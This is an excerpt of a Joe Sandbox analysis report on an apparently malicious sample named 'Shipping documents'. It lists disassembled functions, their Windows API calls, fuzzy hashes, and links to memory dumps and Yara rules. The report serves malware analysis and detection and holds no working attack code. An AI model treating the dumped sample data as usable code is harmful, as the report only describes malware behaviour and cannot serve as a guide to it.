                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 2880819207-0
                                                                                                          • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                          • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                          • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                          • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                          Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                          • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                          • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 357397906-0
                                                                                                          • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                          • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                          • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                          • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                          Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                          • __wsplitpath.LIBCMT ref: 00433950
                                                                                                          • __wcsicoll.LIBCMT ref: 00433974
                                                                                                          • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                          • String ID:
                                                                                                          • API String ID: 1187119602-0
                                                                                                          • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                          • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                          • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                          • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                          Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1597257046-0
                                                                                                          • Opcode ID: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                                                          • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                          • Opcode Fuzzy Hash: 15947565afd9da0c51d6b39d986381e9b8142da2aa4972dda906e7c054fe1a7b
                                                                                                          • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                          Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                          • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                          • String ID:
                                                                                                          • API String ID: 237123855-0
                                                                                                          • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                          • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                          • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                          • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                          Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DeleteDestroyObject$IconWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 3349847261-0
                                                                                                          • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                          • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                          • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                          • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                          Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                          • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                          • String ID:
                                                                                                          • API String ID: 2223660684-0
                                                                                                          • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                          • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                          • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                          • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                          Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                            • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                            • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                            • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                          • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                          • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                          • EndPath.GDI32(?), ref: 00447336
                                                                                                          • StrokePath.GDI32(?), ref: 00447344
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                          • String ID:
                                                                                                          • API String ID: 2783949968-0
                                                                                                          • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                          • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                          • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                          • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                          Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                          • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2710830443-0
                                                                                                          • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                          • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                          • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                          • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                          Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                          • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                          • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                            • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                            • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                          • String ID:
                                                                                                          • API String ID: 146765662-0
                                                                                                          • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                          • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                          • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                          • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                          Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                          • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                          • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                          • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                          • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                          Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                          • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                          • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2889604237-0
                                                                                                          • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                          • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                          • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                          • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                          Function 0041514D Relevance: 6.0, APIs: 4, Instructions: 16threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __getptd_noexit.LIBCMT ref: 00415150
                                                                                                            • Part of subcall function 004179F0: GetLastError.KERNEL32(?,?,00417F7C,00413644,?,?,004115F6,?,00401BAC,?,?,?), ref: 004179F4
                                                                                                            • Part of subcall function 004179F0: ___set_flsgetvalue.LIBCMT ref: 00417A02
                                                                                                            • Part of subcall function 004179F0: __calloc_crt.LIBCMT ref: 00417A16
                                                                                                            • Part of subcall function 004179F0: GetCurrentThreadId.KERNEL32 ref: 00417A46
                                                                                                            • Part of subcall function 004179F0: SetLastError.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 00417A5E
                                                                                                          • CloseHandle.KERNEL32(?,?,0041519B), ref: 00415164
                                                                                                          • __freeptd.LIBCMT ref: 0041516B
                                                                                                          • ExitThread.KERNEL32 ref: 00415173
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLastThread$CloseCurrentExitHandle___set_flsgetvalue__calloc_crt__freeptd__getptd_noexit
                                                                                                          • String ID:
                                                                                                          • API String ID: 1454798553-0
                                                                                                          • Opcode ID: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                          • Instruction ID: f82a1693998e09e6351869d5e4a2ded823041337c12103c56f11d560ed0c89ab
                                                                                                          • Opcode Fuzzy Hash: 061228abfcaf70d0abda61f2bc5ea784a59968e7eaac298a3a03e2daddecc56e
                                                                                                          • Instruction Fuzzy Hash: BCD0A732805E10A7C122273D5C0DBDF26655F40735B140B09FC25872D1CBACDDC143AC
                                                                                                          Function 004624C5 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 409COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
